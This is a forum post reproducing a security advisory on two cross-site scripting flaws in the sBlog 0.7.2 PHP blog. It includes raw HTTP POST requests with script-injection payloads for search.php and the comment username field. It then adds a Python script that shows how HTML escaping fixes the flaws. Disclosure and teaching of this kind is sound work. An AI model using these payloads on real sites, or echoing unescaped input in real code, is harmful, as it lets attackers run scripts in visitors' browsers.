Kiki
Regular user

Joined: Nov 13, 2005
Posts: 7
Location: Italy

Code:
sBlog 0.7.2 <== Multiple Cross-Site Scripting Vulnerabilities
===================================
Information of Software:
Software: sBlog 0.7.2
Site: http://servous.se/
Description: sBlog is a simple and new PHP blog. It is very, very simple
and is used by PHP newbies.
===================================
Bug:
1) Cross-Site Scripting Vulnerability in the page search.php
sBlog contains a flaw that allows a remote cross-site scripting attack.
The vulnerability is found in the search method: the user can modify
the GET function and insert the XSS code.
- HTTP Normal POST Request
http://[target]/[path]/search.php
POST /[path]/search.php HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[target]/[path]/search.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
keyword=casa
- End of Normal POST Request
but we can modify the POST request in this way:
[....]
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
keyword=%3Cscript%3Ealert%28%22lol%22%29%3B%3C%2Fscript%3E
[....]
---------------------------------------------------------
PoC for the first vulnerability:
you can insert the key <script>alert("lol");</script> in the search textbox to
execute an XSS attack.
###########################################
2) Cross-Site Scripting Vulnerability in the name field of the user post comment
This vulnerability can be exploited by malicious people to conduct
script insertion attacks.
Input passed to the "title" field when editing submitted articles, and
reportedly also when commenting on articles, isn't properly sanitised
before being used. This can be exploited to inject arbitrary HTML and
script code, which will be executed in a user's browser session in the
context of an affected site when the malicious user data is viewed.
- HTTP Normal POST Request
http://[target]/[path]/comments_do.php
POST [path]/comments_do.php HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[target]/[path]/comments.php?id=news_id
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
blog_id=id_of_news&username=Test&email=&homepage=&comment=Test
but we can modify the &username variable in the POST request in this way:
[....]
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
blog_id=3&username=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&email=&homepage=&comment=test
[....]
---------------------------------------------------------
PoC for the second vulnerability:
you can insert XSS code, or HTML code, in the name textbox of the user comment to
execute a cross-site scripting attack.
===================================
Credit:
Author: Kiki
e-mail: federico.sana@alice.it
web page: http://kiki91.altervista.org and http://blackzero.netsons.org
===================================
Original advisory: http://kiki91.altervista.org/exploit/sBlog_0.72_xss.txt
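Added example (mine, not from the advisory or from sBlog): a Python script that URL-decodes the two captured POST bodies above, shows why echoing the decoded keyword/username into the page unescaped reflects the script tag, and applies HTML entity encoding as the fix. The rendering template and the list of fields to check are assumptions.

```python
import html
from urllib.parse import parse_qs

# Constructed samples: the two modified request bodies quoted in the advisory.
SEARCH_BODY = "keyword=%3Cscript%3Ealert%28%22lol%22%29%3B%3C%2Fscript%3E"
COMMENT_BODY = ("blog_id=3&username=%3Cscript%3Ealert%28%22XSS%22%29%3B"
                "%3C%2Fscript%3E&email=&homepage=&comment=test")


def decode_form(body):
    """URL-decode an application/x-www-form-urlencoded body (first value per field)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_unsafe(value):
    # Mirrors the flaw: the decoded parameter is placed straight into the HTML response
    # (hypothetical template standing in for the echo in search.php / comments).
    return "<p>Results for: " + value + "</p>"


def render_safe(value):
    # Fix: encode for the HTML text context; <, >, &, " and ' become entities,
    # so the browser shows the payload as text instead of running it.
    return "<p>Results for: " + html.escape(value, quote=True) + "</p>"


def has_active_content(rendered):
    """True if the rendered HTML still contains a live <script> tag."""
    return "<script" in rendered.lower()


def check_request(body, fields):
    """Names of fields whose decoded value would inject markup if echoed raw."""
    params = decode_form(body)
    return [f for f in fields
            if f in params and has_active_content(render_unsafe(params[f]))]


if __name__ == "__main__":
    keyword = decode_form(SEARCH_BODY)["keyword"]
    print("unsafe:", render_unsafe(keyword))
    print("safe:  ", render_safe(keyword))
    print("flagged comment fields:", check_request(COMMENT_BODY, ["username", "comment"]))
```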